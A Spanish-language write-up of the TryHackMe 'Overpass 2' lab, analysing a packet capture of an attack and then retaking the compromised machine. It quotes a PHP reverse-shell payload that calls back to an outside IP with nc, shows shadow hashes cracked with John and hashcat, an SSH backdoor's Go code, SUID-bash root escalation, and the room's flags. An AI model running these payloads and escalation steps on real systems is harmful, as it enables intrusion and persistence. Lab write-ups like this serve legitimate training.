Overpass 2 - Hacked [TryHackMe]
2023-09-04
Introducción
Overpass dos es una sala distinta a las anteriores, esta vez no se trata de atacar un objetivo, si no de analizar un ataque y recuperar el control de una máquina que ha sido vulnerada. La primera parte consiste en analizar el tráfico de red capturado en un fichero pcapng con Wireshark, y una vez se haya descubierto el método usado por los atacantes, entrar en el equipo y conseguir las banderas.
Task 1 - Forensics - Analyse the PCAP
Paso 1
- Descargo el fichero pcapng y lo analizo con Wireshark.
- Revisando los primeros paquetes, encuentro que los atacantes aprovechan la URL /development para subir una reverse shell.
- El payload utilizado ha sido:
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
Paso 2
- Los atacantes acceden a /etc/shadow y a /etc/passwd para obtener usuarios y hashes del sistema.
- La contraseña usada para obtener acceso privilegiado ha sido whenevernoteartinstant
- Encuentro que acceden a https://github.com/NinjaJc01/ssh-backdoor y clonan el repositorio para generar un payload de persistencia en el sistema.
Paso 3
- En el tráfico capturado, se puede ver el contenido de /etc/passwd
❯ cat shadow.txt
───────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: shadow.txt
───────┼─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ root:*:18295:0:99999:7:::
2 │ daemon:*:18295:0:99999:7:::
3 │ bin:*:18295:0:99999:7:::
4 │ sys:*:18295:0:99999:7:::
5 │ sync:*:18295:0:99999:7:::
6 │ games:*:18295:0:99999:7:::
7 │ man:*:18295:0:99999:7:::
8 │ lp:*:18295:0:99999:7:::
9 │ mail:*:18295:0:99999:7:::
10 │ news:*:18295:0:99999:7:::
11 │ uucp:*:18295:0:99999:7:::
12 │ proxy:*:18295:0:99999:7:::
13 │ www-data:*:18295:0:99999:7:::
14 │ backup:*:18295:0:99999:7:::
15 │ list:*:18295:0:99999:7:::
16 │ irc:*:18295:0:99999:7:::
17 │ gnats:*:18295:0:99999:7:::
18 │ nobody:*:18295:0:99999:7:::
19 │ systemd-network:*:18295:0:99999:7:::
20 │ systemd-resolve:*:18295:0:99999:7:::
21 │ syslog:*:18295:0:99999:7:::
22 │ messagebus:*:18295:0:99999:7:::
23 │ _apt:*:18295:0:99999:7:::
24 │ lxd:*:18295:0:99999:7:::
25 │ uuidd:*:18295:0:99999:7:::
26 │ dnsmasq:*:18295:0:99999:7:::
27 │ landscape:*:18295:0:99999:7:::
28 │ pollinate:*:18295:0:99999:7:::
29 │ sshd:*:18464:0:99999:7:::
30 │ james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
31 │ paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
32 │ szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
33 │ bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
34 │ muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
- Compruebo con John The Ripper que hay 4 contraseñas vulnerables.
❯ john hashes.txt --wordlist=/usr/share/wordlists/fasttrack.txt
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Remaining 1 password hash
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2023-09-04 00:03) 0g/s 7400p/s 7400c/s 7400C/s Spring2017..starwars
Session completed.
❯ john hashes.txt --show
paradox:secuirty3:18464:0:99999:7:::
szymex:abcd123:18464:0:99999:7:::
bee:secret12:18464:0:99999:7:::
muirland:1qaz2wsx:18464:0:99999:7:::
4 password hashes cracked, 1 left
Task 2 - Research - Analyse the code
Paso 4
- El codigo del payload contiene el hash que se utilizar;a para el backdoor, al que después le añade el salt en una función en el mismo código. Fichero main.go del repositorio https://github.com/NinjaJc01/ssh-backdoor
package main
import (
"crypto/sha512"
"fmt"
"io"
"io/ioutil"
"log"
"net"
"os/exec"
"github.com/creack/pty"
"github.com/gliderlabs/ssh"
"github.com/integrii/flaggy"
gossh "golang.org/x/crypto/ssh"
"golang.org/x/crypto/ssh/terminal"
)
var hash string = "bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3"
- El salt viene en esta parte del codigo:
func passwordHandler(_ ssh.Context, password string) bool {
return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password)
}
- En los paquetes capturados, encuentro el hash usado por el atacante.
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
Paso 5
- Junto el hash y el salt en un fichero y los paso por John the Ripper para crackearlo. No parece conseguir crackearlo, asi que cambio a hashcat.
───────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: overpass
───────┼─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ ❯ hashcat -m 1710 password.txt -a 0 /usr/share/wordlists/rockyou.txt -o output.txt
2 │ hashcat (v6.2.6) starting
3 │
4 │ * Device #1: WARNING! Kernel exec timeout is not disabled.
5 │ This may cause "CL_OUT_OF_RESOURCES" or related errors.
6 │ To disable the timeout, see: https://hashcat.net/q/timeoutpatch
7 │ * Device #2: WARNING! Kernel exec timeout is not disabled.
8 │ This may cause "CL_OUT_OF_RESOURCES" or related errors.
9 │ To disable the timeout, see: https://hashcat.net/q/timeoutpatch
10 │ CUDA API (CUDA 12.0)
11 │ ====================
12 │ * Device #1: NVIDIA GeForce RTX 4080, 15337/16077 MB, 76MCU
13 │
14 │ OpenCL API (OpenCL 3.0 CUDA 12.0.151) - Platform #1 [NVIDIA Corporation]
15 │ ========================================================================
16 │ * Device #2: NVIDIA GeForce RTX 4080, skipped
17 │
18 │ OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
19 │ ==================================================================================================================================================
20 │ * Device #3: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, skipped
21 │
22 │ Minimum password length supported by kernel: 0
23 │ Maximum password length supported by kernel: 256
24 │ Minimim salt length supported by kernel: 0
25 │ Maximum salt length supported by kernel: 256
26 │
27 │ Hashes: 1 digests; 1 unique digests, 1 unique salts
28 │ Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
29 │ Rules: 1
30 │
31 │ Optimizers applied:
32 │ * Zero-Byte
33 │ * Early-Skip
34 │ * Not-Iterated
35 │ * Single-Hash
36 │ * Single-Salt
37 │ * Raw-Hash
38 │ * Uses-64-Bit
39 │
40 │ ATTENTION! Pure (unoptimized) backend kernels selected.
41 │ Pure kernels can crack longer passwords, but drastically reduce performance.
42 │ If you want to switch to optimized kernels, append -O to your commandline.
43 │ See the above message to find out about the exact limits.
44 │
45 │ Watchdog: Temperature abort trigger set to 90c
46 │
47 │ Host memory required for this attack: 1334 MB
48 │
49 │ Dictionary cache built:
50 │ * Filename..: /usr/share/wordlists/rockyou.txt
51 │ * Passwords.: 14344392
52 │ * Bytes.....: 139921507
53 │ * Keyspace..: 14344385
54 │ * Runtime...: 0 secs
55 │
56 │
57 │ Session..........: hashcat
58 │ Status...........: Cracked
59 │ Hash.Mode........: 1710 (sha512($pass.$salt))
60 │ Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05
61 │ Time.Started.....: Sun Sep 3 18:38:09 2023 (0 secs)
62 │ Time.Estimated...: Sun Sep 3 18:38:09 2023 (0 secs)
63 │ Kernel.Feature...: Pure Kernel
64 │ Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
65 │ Guess.Queue......: 1/1 (100.00%)
66 │ Speed.#1.........: 206.9 MH/s (5.20ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
67 │ Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
68 │ Progress.........: 4980736/14344385 (34.72%)
69 │ Rejected.........: 0/4980736 (0.00%)
70 │ Restore.Point....: 0/14344385 (0.00%)
71 │ Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
72 │ Candidate.Engine.: Device Generator
73 │ Candidates.#1....: 123456 -> nuquni89yHt
74 │ Hardware.Mon.#1..: Temp: 40c Fan: 0% Util: 31% Core:2505MHz Mem:10802MHz Bus:16
75 │
76 │ Started: Sun Sep 3 18:38:02 2023
77 │ Stopped: Sun Sep 3 18:38:10 2023
78 │
│
79 │ ❯ cat output.txt
80 │ ───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ ─────────
81 │ │ File: output.txt
82 │ ───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ ─────────
83 │ 1 │ 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:novem
│ ber16
84 │ ───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ ─────────
- La contraseña es november16
Task 3 - Attack - Get back in!
Paso 6
- El atacante dejó su firma en la web, al acceder se puede leer H4ck3d by CooctusClan
- Usando la informacion recopilada, accedo por SSH, aprovecho el SUID de un binario y consigo acceso privilegiado con una vulnerabilidad que indica GTOFbins.
───────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: ssh
───────┼─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ ❯ ssh -oHostKeyAlgorithms=+ssh-rsa james@10.10.55.155 -p 2222
2 │ The authenticity of host '[10.10.55.155]:2222 ([10.10.55.155]:2222)' can't be established.
3 │ RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
4 │ This key is not known by any other names.
5 │ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
6 │ Warning: Permanently added '[10.10.55.155]:2222' (RSA) to the list of known hosts.
7 │ james@10.10.55.155's password:
8 │ To run a command as administrator (user "root"), use "sudo <command>".
9 │ See "man sudo_root" for details.
10 │
11 │ james@overpass-production:/home/james/ssh-backdoor$ ll
12 │ total 6584
13 │ drwxrwxr-x 3 james james 4096 Jul 22 2020 ./
14 │ drwxr-xr-x 7 james james 4096 Jul 22 2020 ../
15 │ drwxrwxr-x 8 james james 4096 Jul 21 2020 .git/
16 │ -rw-rw-r-- 1 james james 109 Jul 21 2020 README.md
17 │ -rwxrwxr-x 1 james james 6634961 Jul 21 2020 backdoor*
18 │ -rw-rw-r-- 1 james james 362 Jul 22 2020 backdoor.service
19 │ -rw-rw-r-- 1 james james 104 Jul 21 2020 build.sh
20 │ -rw-rw-r-- 1 james james 60102 Jul 21 2020 cooctus.png
21 │ -rw------- 1 james james 1679 Jul 21 2020 id_rsa
22 │ -rw-r--r-- 1 james james 407 Jul 21 2020 id_rsa.pub
23 │ -rw-rw-r-- 1 james james 815 Jul 21 2020 index.html
24 │ -rw-rw-r-- 1 james james 2788 Jul 21 2020 main.go
25 │ -rw-rw-r-- 1 james james 241 Jul 21 2020 setup.sh
26 │ james@overpass-production:/home/james/ssh-backdoor$ cd
27 │ bash: cd: HOME not set
28 │ james@overpass-production:/home/james/ssh-backdoor$ cd /home/james
29 │ james@overpass-production:/home/james$ ll
30 │ total 1136
31 │ drwxr-xr-x 7 james james 4096 Jul 22 2020 ./
32 │ drwxr-xr-x 7 root root 4096 Jul 21 2020 ../
33 │ lrwxrwxrwx 1 james james 9 Jul 21 2020 .bash_history -> /dev/null
34 │ -rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout
35 │ -rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc
36 │ drwx------ 2 james james 4096 Jul 21 2020 .cache/
37 │ drwx------ 3 james james 4096 Jul 21 2020 .gnupg/
38 │ drwxrwxr-x 3 james james 4096 Jul 22 2020 .local/
39 │ -rw------- 1 james james 51 Jul 21 2020 .overpass
40 │ -rw-r--r-- 1 james james 807 Apr 4 2018 .profile
41 │ -rw-r--r-- 1 james james 0 Jul 21 2020 .sudo_as_admin_successful
42 │ -rwsr-sr-x 1 root root 1113504 Jul 22 2020 .suid_bash*
43 │ drwxrwxr-x 3 james james 4096 Jul 22 2020 ssh-backdoor/
44 │ -rw-rw-r-- 1 james james 38 Jul 22 2020 user.txt
45 │ drwxrwxr-x 7 james james 4096 Jul 21 2020 www/
46 │ james@overpass-production:/home/james$ cat user.txt
47 │ thm{d119b4fa8c497ddb0525f7ad200e6567}
48 │
49 │
50 │ james@overpass-production:/home$ find / -perm -u=s -type f 2>/dev/null
51 │ /usr/bin/chsh
52 │ /usr/bin/sudo
53 │ /usr/bin/chfn
54 │ /usr/bin/pkexec
55 │ /usr/bin/traceroute6.iputils
56 │ /usr/bin/newuidmap
57 │ /usr/bin/newgidmap
58 │ /usr/bin/passwd
59 │ /usr/bin/gpasswd
60 │ /usr/bin/at
61 │ /usr/bin/newgrp
62 │ /usr/lib/openssh/ssh-keysign
63 │ /usr/lib/dbus-1.0/dbus-daemon-launch-helper
64 │ /usr/lib/policykit-1/polkit-agent-helper-1
65 │ /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
66 │ /usr/lib/eject/dmcrypt-get-device
67 │ /bin/mount
68 │ /bin/fusermount
69 │ /bin/su
70 │ /bin/ping
71 │ /bin/umount
72 │ /home/james/.suid_bash
73 │ james@overpass-production:/home$
74 │
75 │
76 │ james@overpass-production:/home$ /home/james/.suid_bash -p
77 │ .suid_bash-4.4# whoami
78 │ root
79 │ .suid_bash-4.4#
80 │
81 │
82 │ .suid_bash-4.4# cd /root
83 │ .suid_bash-4.4# ls
84 │ root.txt
85 │ .suid_bash-4.4# cat root.txt
86 │ thm{d53b2684f169360bb9606c333873144d}
───────┴─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
(END)
Conclusion
El enfoque de esta maquina era distinto a las otras, presentando un reto desde el punto de vista de un analista de seguridad en un SOC. Mediante el analisis del tráfico de red se ha podido averiguar que tipo de ataque se ha llevado a cabo por parte de los atacantes, y hemos podido usar dicha información para tomar el control del equipo vulnerado y restablecerlo.